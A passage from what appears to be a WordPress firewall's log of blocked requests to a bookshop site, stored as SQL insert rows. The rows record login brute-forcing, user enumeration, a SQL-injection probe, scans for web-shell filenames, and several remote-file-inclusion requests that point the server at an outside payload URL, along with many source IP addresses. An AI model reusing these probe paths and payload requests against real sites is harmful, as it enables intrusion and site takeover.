Chrome\\/90.0.4430.93 Safari\\/537.36\"}','il0pP4hdjrWAT5IRC6LoDSyq',0,1638165374.7201,469,'','POST',403,0,600,0,1,'',0),('185.103.199.253',3110586365,'','https://ashbooks.co.uk/style.php?sig=rename&source_name=boktandosyaadi1&rename=boktandosyaadi2','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko\\/20100101 Firefox\\/81.0\"}','Ld0NSl15A3HK7V9Tfupvrask',0,1638166954.2462,533,'','GET',403,0,700,0,1,'',0),('147.182.198.71',2478229063,'','https://www.ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"python-requests\\/2.25.1\"}','rjvYTfFIqplCH2XSsuW1NQ3P',0,1638169121.0382,409,'','GET',403,0,700,0,1,'',0),('185.81.157.200',3109133768,'','https://ashbooks.co.uk/virtual-teams-how-to-sustain-high-performing-teams-in-the-virtual-workplace/index.php?id=1%27','','{\"1\":\"Python-urllib\\/2.7\"}','uKaB091SEGVxoAzpYftJl5ZO',0,1638176389.6738,415,'','GET',403,0,700,0,1,'',0),('88.99.209.173',1482936749,'','https://ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','dKmg4X9f8xH76JDRYMPVlOZ5',0,1638180216.5639,179,'','GET',403,0,520,0,1,'',0),('185.191.34.215',3116311255,'','https://ashbooks.co.uk/s_ne.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','J8kVLEjm70CAYlge4a5cfPvW',0,1638181162.0753,453,'','POST',403,0,700,0,1,'',0),('104.244.77.53',1760841013,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','iIRjAXECt6yLPK1zYuaDsTkV',0,1638187346.3903,438,'','POST',403,0,600,0,1,'',0),('64.111.109.226',1081044450,'','https://ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','PXKCqp2w9xjyBOW1Ng0tI3UQ',0,1638195173.0161,881,'','GET',403,0,520,0,1,'',0),('124.49.136.214',2083621078,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','eMmEiQ6L9dG3TIJ8t75bqFgB',0,1638195223.5095,226,'','POST',403,0,600,0,1,'',0),('124.49.136.214',2083621078,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','iQ2NcS93oFbmCeEuZfUP6AMp',0,1638195232.8297,477,'','POST',403,0,600,0,1,'',0),('124.49.136.214',2083621078,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','riUxjh73WvfNEJY9AQswmIdV',0,1638195236.4986,1176,'','POST',403,0,600,0,1,'',0),('124.49.136.214',2083621078,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','2GPKSypf4tFgklIT6zb5nR7h',0,1638195251.1240,1308,'','POST',403,0,600,0,1,'',0),('124.49.136.214',2083621078,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','pjLwFOXm910D6uhHgVbN4PUE',0,1638195256.0462,440,'','POST',403,0,600,0,1,'',0),('124.49.136.214',2083621078,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','mrzkbsycXo9HNKfTJtapF70C',0,1638195259.7661,451,'','POST',404,0,700,0,1,'',0),('124.49.136.214',2083621078,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','zspkmtGJlb1HC35jfDoAPZBM',0,1638195263.6073,430,'','POST',404,0,700,0,1,'',0),('192.187.127.21',3233513237,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','dNmh8q2jbiOuKCIgVlZ4f1kM',0,1638196461.1804,473,'','POST',403,0,600,0,1,'',0),('62.210.113.119',1053978999,'','https://ashbooks.co.uk/wp-admin/auto_seo.php?ARRAY[0]=123','','{\"1\":\"Mozilla\\/5.1 (Windows NT 6.0; WOW64) AppleWebKit\\/537.37 (KHTML, like Gecko) Chrome\\/58.0.1145.75 Safari\\/537.37\",\"2\":\"ashbooks.co.uk\"}','50F7xR3C8f92w1oSYuHclLbB',0,1638196921.9266,447,'','GET',403,0,700,0,1,'',0),('62.210.113.119',1053978999,'','https://ashbooks.co.uk/auto_seo.php?ARRAY[0]=123','','{\"1\":\"Mozilla\\/5.1 (Windows NT 6.0; WOW64) AppleWebKit\\/537.37 (KHTML, like Gecko) Chrome\\/58.0.1145.75 Safari\\/537.37\",\"2\":\"ashbooks.co.uk\"}','Sfai09NQZsHbtoB2Kjcdr7Oy',0,1638196985.6771,421,'','GET',403,0,700,0,1,'',0),('62.210.113.119',1053978999,'','https://ashbooks.co.uk/wp-content/auto_seo.php?ARRAY[0]=123','','{\"1\":\"Mozilla\\/5.1 (Windows NT 6.0; WOW64) AppleWebKit\\/537.37 (KHTML, like Gecko) Chrome\\/58.0.1145.75 Safari\\/537.37\",\"2\":\"ashbooks.co.uk\"}','L4T813RwSWkFfpJDACZMbXIo',0,1638197031.3371,453,'','GET',403,0,700,0,1,'',0),('107.150.48.237',1805005037,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','8CPWJvhHoaAR6ru14wV2cl0D',0,1638222020.8805,193,'','POST',403,0,600,0,1,'',0),('23.228.109.147',400846227,'','https://ashbooks.co.uk/ofc2/php-ofc-library/ofc_upload_image.php','','{\"1\":\"ALittle Client\"}','v5B2UKnrQXsjbOD1kMmaAtTp',0,1638230054.0089,388,'','GET',403,0,700,0,1,'',0),('69.30.231.155',1159653275,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','jYdowSP2EZsu7nJypD5OTkf1',0,1638231326.0216,438,'','POST',403,0,600,0,1,'',0),('204.12.198.242',3423389426,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','NVBcExFjDtIR8anH9hpbzYl5',0,1638235938.7948,644,'','POST',403,0,600,0,1,'',0),('107.170.252.104',1806367848,'','https://ashbooks.co.uk/wp-content/plugins/wp-automatic/process_form.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','bSGjy0DzPZdiRExuksX3OhCK',0,1638236041.5373,371,'','POST',403,0,700,0,1,'',0),('107.170.252.104',1806367848,'','https://ashbooks.co.uk/wp-content/plugins/wp-automatic/process_form.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','qlhm3BA89gYJHbTESL7co1Df',0,1638236045.2928,374,'','POST',403,0,700,0,1,'',0),('142.93.243.235',2388521963,'','https://ashbooks.co.uk/wp-content/plugins/wp-automatic/process_form.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','VXsatdML9hi0cYJujAH82KNG',0,1638236084.2049,772,'','POST',403,0,700,0,1,'',0),('142.93.243.235',2388521963,'','https://ashbooks.co.uk/wp-content/plugins/wp-automatic/process_form.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','VgOu7zQZpqcwkHv9bJ4lIPDY',0,1638236099.1605,380,'','POST',403,0,700,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\"}','ij0QDWv4bTeB8a5xVG923YP6',0,1638245073.9200,908,'','POST',403,0,600,0,1,'',0),('217.9.143.94',3641282398,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36\"}','WTbU9g5ptXkn7j3KYNm8yDMe',0,1638246928.6494,905,'','POST',403,0,600,0,1,'',0),('95.217.3.203',1608057803,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1700.107 Safari\\/537.36\"}','mJtfh71y2B8joL6dP4GEOrsa',0,1638247846.8548,619,'','POST',403,0,600,0,1,'',0),('176.31.0.242',2954821874,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','Q8avwcGbD0ENJuRKi4lUZL5S',0,1638249868.7440,520,'','POST',403,0,600,0,1,'',0),('35.202.150.249',600479481,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','Qk3PsftD4MFCr5YwK1ISdAn0',0,1638250991.8189,536,'','POST',403,0,600,0,1,'',0),('47.105.61.35',795426083,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','H7R82ZlowjkYXa4DUiQvGcMs',0,1638251979.3141,597,'','POST',403,0,600,0,1,'',0),('178.128.194.13',2994782733,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2272.101 Safari\\/537.36\"}','J5cZRpgMBveralN8wK7ij9Pu',0,1638253245.3446,497,'','POST',403,0,600,0,1,'',0),('107.150.57.35',1805007139,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Ubuntu Chromium\\/36.0.1985.125 Chrome\\/36.0.1985.125 Safari\\/537.36\"}','MGhdSHbTK01rvy3PqBUt6LnI',0,1638254232.3741,180,'','POST',403,0,600,0,1,'',0),('68.183.108.18',1152871442,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','qQe4yPMEf6oX501HsC3TIhFx',0,1638254358.9993,487,'','POST',403,0,600,0,1,'',0),('185.2.4.71',3103917127,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','ZzicmXDjuxAawPs6BG5UykEo',0,1638255467.9768,528,'','POST',403,0,600,0,1,'',0),('192.187.118.202',3233511114,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D257 Safari\\/9537.53\"}','PMBxEk3XGnhJfL0lqoOTdYu2',0,1638258412.4004,163,'','POST',403,0,600,0,1,'',0),('206.189.139.182',3468528566,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','R10uEL8is9lbxHSKAvhJWYMO',0,1638261546.6036,546,'','POST',403,0,600,0,1,'',0),('51.77.223.41',860741417,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','f2eCd0mohbG4MTRS1kHcP6vs',0,1638262628.0956,933,'','POST',403,0,600,0,1,'',0),('34.75.201.58',575392058,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 Safari\\/537.36\"}','trsEjALb7eM3PBn6TUJxzhXg',0,1638263935.2805,516,'','POST',403,0,600,0,1,'',0),('138.197.12.140',2328169612,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','I6ZGvSnYebx4maPWyduHszBM',0,1638265013.2328,788,'','POST',403,0,600,0,1,'',0),('152.228.140.7',2565114887,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.87 Safari\\/537.36\"}','yZFH1Ln7aIPcN9Ck8wDTQW2X',0,1638266163.1653,7989,'','POST',403,0,600,0,1,'',0),('178.73.217.204',2991184332,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 Safari\\/537.36\"}','fdMJlDOsEvx2omUPZih5wenK',0,1638267346.5545,477,'','POST',403,0,600,0,1,'',0),('34.77.178.214',575517398,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.109 Safari\\/537.36\"}','Qa1K2PDiUnkh0FX83ETsWtu5',0,1638268249.7552,468,'','POST',403,0,600,0,1,'',0),('69.30.231.155',1159653275,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','2N7GpezAKHtRJr6FioO589PL',0,1638268933.8692,160,'','POST',403,0,600,0,1,'',0),('185.238.75.78',3119401806,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','HuTpU0mokN1c9JvaASEwYtV3',0,1638269231.6097,433,'','POST',403,0,600,0,1,'',0),('77.240.13.186',1307577786,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','KYJy3RFOxk2lCLDXvaPBpnTU',0,1638270247.3597,487,'','POST',403,0,600,0,1,'',0),('185.103.199.199',3110586311,'','https://ashbooks.co.uk/hbhbrdryld.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko\\/20100101 Firefox\\/81.0\"}','KWhgTdJptOfDzyb3Cei8RQ0w',0,1638270430.3459,376,'','GET',403,0,700,0,1,'',0),('185.103.199.116',3110586228,'','https://ashbooks.co.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko\\/20100101 Firefox\\/81.0\"}','NgM9uIcFav2CfoxtPr48jd1V',0,1638270430.8938,123,'','GET',403,0,700,0,1,'',0),('152.228.140.7',2565114887,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','IGXUOaLfAzeq8rdHVJbnWS0p',0,1638271282.5795,489,'','POST',403,0,600,0,1,'',0),('177.55.111.11',2973200139,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.75 Safari\\/537.36\"}','PprztAvUi9I60VkXyBZCNuSL',0,1638272196.7794,533,'','POST',403,0,600,0,1,'',0),('188.40.71.188',3156756412,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','N5KgdU6Sytn3TV4bqEAXDfIc',0,1638273215.9425,458,'','POST',403,0,600,0,1,'',0),('156.38.216.210',2619791570,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','1l6iJMQNR5fKxvzYHID4Lc7C',0,1638274559.2278,1248,'','POST',403,0,600,0,1,'',0),('3.9.154.222',50961118,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','H3dKy75GJZrVscaCmSf0tX29',0,1638275671.7685,493,'','POST',403,0,600,0,1,'',0),('88.150.159.29',1486266141,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','sTzNJ34Bbdnq6XhagSDetO7r',0,1638276924.2215,485,'','POST',403,0,600,0,1,'',0),('94.23.83.103',1578586983,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','BAY6p3cWT4UVh8JXKmPIDojg',0,1638278159.5033,669,'','POST',403,0,600,0,1,'',0),('94.23.83.103',1578586983,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1700.107 Safari\\/537.36\"}','pkbT3WSuLEjyFZBHt7RQgcqC',0,1638279184.3102,433,'','POST',403,0,600,0,1,'',0),('103.152.118.225',1738045153,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','dkZX16TmGhSwnJ48HIfKvsYr',0,1638281425.2591,430,'','POST',403,0,600,0,1,'',0),('45.40.166.142',757638798,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 Safari\\/537.36\"}','UuDWdIsR1Nwy6pLkA2Z7f8rF',0,1638282425.3284,1507,'','POST',403,0,600,0,1,'',0),('198.252.110.1',3338432001,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','DjqnasL3Fwfi01hK7zrQb2GX',0,1638283416.2957,971,'','POST',403,0,600,0,1,'',0),('109.74.197.132',1833616772,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','jF6YIrthoeAMdnUyfJW1mXpS',0,1638284355.8964,540,'','POST',403,0,600,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','a8KYZ0IqxPf2glpUo6uOQh1B',0,1638284724.9714,453,'','GET',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','maPbZ3HRDfITqeLtGXOU1xBo',0,1638284761.6518,403,'','GET',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','jFAVhDGdvqWpn4rR7E2zL9XN',0,1638284831.3762,419,'','GET',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/boom.php?x','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','7rzH9pbOuit0hwMsQ4C5dPmN',0,1638284896.0495,414,'','GET',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/wp-content/plugins/backup_index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','zKLrDJCqjw0QBuGg3PHpF7Vd',0,1638284908.5782,184,'','GET',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','nQm0gFaquENbWoGxO7ctMyhY',0,1638284946.1012,461,'','GET',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','aEbLMkuSZ4dcz9CQoXtOHvrD',0,1638284986.3982,415,'','GET',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','vC6qoZlXW2PubTf7m8gBLShR',0,1638284997.9578,385,'','GET',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','lqkdAH5W4RIU1gXEPthz2LKD',0,1638285015.3435,398,'','GET',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/alfindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','JG1dTzNPFYest79nI0ZL53Mu',0,1638285032.9177,434,'','GET',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','lOEy8svx59WQuNZanfjhCXb6',0,1638285048.4811,360,'','GET',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/wp-booking.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Xtw0amREVSZIBeW4GNvfUgMh',0,1638285062.6199,404,'','GET',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/cindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','hDrtE8YOiAylLRP7HmKSJTxu',0,1638285087.2509,436,'','GET',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/wp-content/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','sz1jDVdXkJRmt4bc2plhouPM',0,1638285104.2175,1075,'','GET',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','vaNIX2eEgdS9FuMmjTCRpAo8',0,1638285123.1951,402,'','GET',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/wp-includes/fonts/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 